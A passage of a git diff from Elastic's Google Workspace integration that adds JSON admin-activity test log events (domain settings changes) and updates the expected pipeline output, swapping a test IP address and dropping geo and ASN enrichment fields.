+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"TOGGLE_SSL","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"CHANGE_EU_REPRESENTATIVE_CONTACT_INFO","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"INFO_TYPE","value":"ADDRESS"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"GENERATE_TRANSFER_TOKEN"}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"CHANGE_LOGIN_BACKGROUND_COLOR","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"CHANGE_LOGIN_BORDER_COLOR","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"CHANGE_LOGIN_ACTIVITY_TRACE","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"PLAY_FOR_WORK_ENROLL","parameters":[{"name":"PLAY_FOR_WORK_MDM_VENDOR_NAME","value":"vendor"},{"name":"PLAY_FOR_WORK_TOKEN_ID","value":"token"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"PLAY_FOR_WORK_UNENROLL","parameters":[{"name":"PLAY_FOR_WORK_MDM_VENDOR_NAME","value":"vendor"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"MX_RECORD_VERIFICATION_CLAIM","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"USER_EMAIL","value":"user@example.com"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"TOGGLE_NEW_APP_FEATURES","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"TOGGLE_USE_NEXT_GEN_CONTROL_PANEL","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"UPLOAD_OAUTH_CERTIFICATE","parameters":[{"name":"DOMAIN_NAME","value":"example.com"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"REGENERATE_OAUTH_CONSUMER_SECRET","parameters":[{"name":"DOMAIN_NAME","value":"example.com"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"TOGGLE_OPEN_ID_ENABLED","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"CHANGE_ORGANIZATION_NAME","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"TOGGLE_OUTBOUND_RELAY","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"ORG_UNIT_NAME","value":"org"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"CHANGE_PASSWORD_MAX_LENGTH","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"CHANGE_PASSWORD_MIN_LENGTH","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"UPDATE_DOMAIN_PRIMARY_ADMIN_EMAIL","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"ENABLE_SERVICE_OR_FEATURE_NOTIFICATIONS","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"REMOVE_APPLICATION","parameters":[{"name":"APP_ID","value":"appid"},{"name":"APPLICATION_NAME","value":"app name"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"REMOVE_APPLICATION_FROM_WHITELIST","parameters":[{"name":"APP_ID","value":"appid"},{"name":"APPLICATION_NAME","value":"app name"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"CHANGE_RENEW_DOMAIN_REGISTRATION","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"CHANGE_RESELLER_ACCESS","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"RULE_ACTIONS_CHANGED","parameters":[{"name":"RULE_NAME","value":"rule"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"CREATE_RULE","parameters":[{"name":"RULE_NAME","value":"rule"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"CHANGE_RULE_CRITERIA","parameters":[{"name":"RULE_NAME","value":"rule"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"DELETE_RULE","parameters":[{"name":"RULE_NAME","value":"rule"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"RENAME_RULE","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"RULE_STATUS_CHANGED","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"RULE_NAME","value":"rule"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"ADD_SECONDARY_DOMAIN","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"SECONDARY_DOMAIN_NAME","value":"example2.com"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"REMOVE_SECONDARY_DOMAIN","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"SECONDARY_DOMAIN_NAME","value":"example2.com"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"SKIP_SECONDARY_DOMAIN_MX","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"SECONDARY_DOMAIN_NAME","value":"example2.com"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"VERIFY_SECONDARY_DOMAIN_MX","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"SECONDARY_DOMAIN_NAME","value":"example2.com"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"VERIFY_SECONDARY_DOMAIN","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"SECONDARY_DOMAIN_NAME","value":"example2.com"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"UPDATE_DOMAIN_SECONDARY_EMAIL","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"CHANGE_SSO_SETTINGS","parameters":[{"name":"DOMAIN_NAME","value":"example.com"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"GENERATE_PIN"}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"UPDATE_RULE","parameters":[{"name":"RULE_NAME","value":"rule"}]}} diff --git a/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-domain.log-expected.json b/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-domain.log-expected.json index 83c7dcd8654..e9f2d74ccfc 100644 --- a/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-domain.log-expected.json +++ b/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-domain.log-expected.json @@ -10,7 +10,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -34,35 +34,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:20.091147900Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_ACCOUNT_AUTO_RENEWAL\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"NON_AUTO_RENEWAL\"}]}}", + "ingested": "2021-12-09T13:38:31.915758200Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_ACCOUNT_AUTO_RENEWAL\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"NON_AUTO_RENEWAL\"}]}}", "provider": "admin", "action": "CHANGE_ACCOUNT_AUTO_RENEWAL", "id": "1", @@ -92,7 +74,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -116,35 +98,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:20.091161100Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"ADD_APPLICATION\",\"parameters\":[{\"name\":\"APP_ID\",\"value\":\"id\"},{\"name\":\"APPLICATION_ENABLED\",\"value\":\"app enabled\"},{\"name\":\"APPLICATION_NAME\",\"value\":\"app name\"}]}}", + "ingested": "2021-12-09T13:38:31.915761700Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"ADD_APPLICATION\",\"parameters\":[{\"name\":\"APP_ID\",\"value\":\"id\"},{\"name\":\"APPLICATION_ENABLED\",\"value\":\"app enabled\"},{\"name\":\"APPLICATION_NAME\",\"value\":\"app name\"}]}}", "provider": "admin", "action": "ADD_APPLICATION", "id": "1", @@ -174,7 +138,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -198,35 +162,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:20.091164600Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"ADD_APPLICATION_TO_WHITELIST\",\"parameters\":[{\"name\":\"APP_ID\",\"value\":\"id\"},{\"name\":\"APPLICATION_NAME\",\"value\":\"app name\"}]}}", + "ingested": "2021-12-09T13:38:31.915767800Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"ADD_APPLICATION_TO_WHITELIST\",\"parameters\":[{\"name\":\"APP_ID\",\"value\":\"id\"},{\"name\":\"APPLICATION_NAME\",\"value\":\"app name\"}]}}", "provider": "admin", "action": "ADD_APPLICATION_TO_WHITELIST", "id": "1", @@ -256,7 +202,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -280,35 +226,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:20.091167500Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_ADVERTISEMENT_OPTION\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", + "ingested": "2021-12-09T13:38:31.915773500Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_ADVERTISEMENT_OPTION\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "provider": "admin", "action": "CHANGE_ADVERTISEMENT_OPTION", "id": "1", @@ -338,7 +266,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -362,35 +290,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:20.091170400Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CREATE_ALERT\",\"parameters\":[{\"name\":\"ALERT_NAME\",\"value\":\"alert name\"}]}}", + "ingested": "2021-12-09T13:38:31.915778400Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CREATE_ALERT\",\"parameters\":[{\"name\":\"ALERT_NAME\",\"value\":\"alert name\"}]}}", "provider": "admin", "action": "CREATE_ALERT", "id": "1", @@ -420,7 +330,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -444,35 +354,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:20.091173100Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_ALERT_CRITERIA\",\"parameters\":[{\"name\":\"ALERT_NAME\",\"value\":\"alert name\"}]}}", + "ingested": "2021-12-09T13:38:31.915782300Z", + "original": 